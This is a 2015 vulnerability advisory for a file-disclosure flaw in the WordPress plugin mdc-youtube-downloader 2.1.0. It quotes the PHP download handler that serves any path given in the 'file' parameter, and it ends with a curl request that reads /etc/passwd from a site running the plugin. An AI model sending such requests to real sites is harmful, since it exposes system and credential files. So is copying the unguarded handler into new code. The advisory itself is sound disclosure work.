WordPress MDC-Youtube-Downloader 2.1.0 File Disclosure

`Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-07-01  
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader  
Vendor: https://profiles.wordpress.org/mukto90/  
Vendor Notified: 2015-07-01, removed vulnerable code.  
Vendor Contact: [email protected]  
Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.  
Vulnerability:  
The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be  
downloaded:  
  
$file_name = $_GET['file'];  
  
// make sure it's a file before doing anything!  
if(is_file($file_name)) {  
.  
.  
.  
switch(strtolower(substr(strrchr($file_name, '.'), 1))) {  
case 'pdf': $mime = 'application/pdf'; break;  
case 'zip': $mime = 'application/zip'; break;  
case 'jpeg':  
case 'jpg': $mime = 'image/jpg'; break;  
default: $mime = 'application/force-download';  
}  
header('Pragma: public'); // required  
header('Expires: 0'); // no cache  
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');  
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');  
header('Cache-Control: private',false);  
header('Content-Type: '.$mime);  
header('Content-Disposition: attachment; filename="'.basename($file_name).'"');  
header('Content-Transfer-Encoding: binary');  
header('Content-Length: '.filesize($file_name)); // provide file size  
header('Connection: close');  
readfile($file_name); // push it out  
exit();  
  
CVEID: Requested, TBD.  
OSVDB: TBD.  
Exploit Code:  
• $ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd  
  
  
`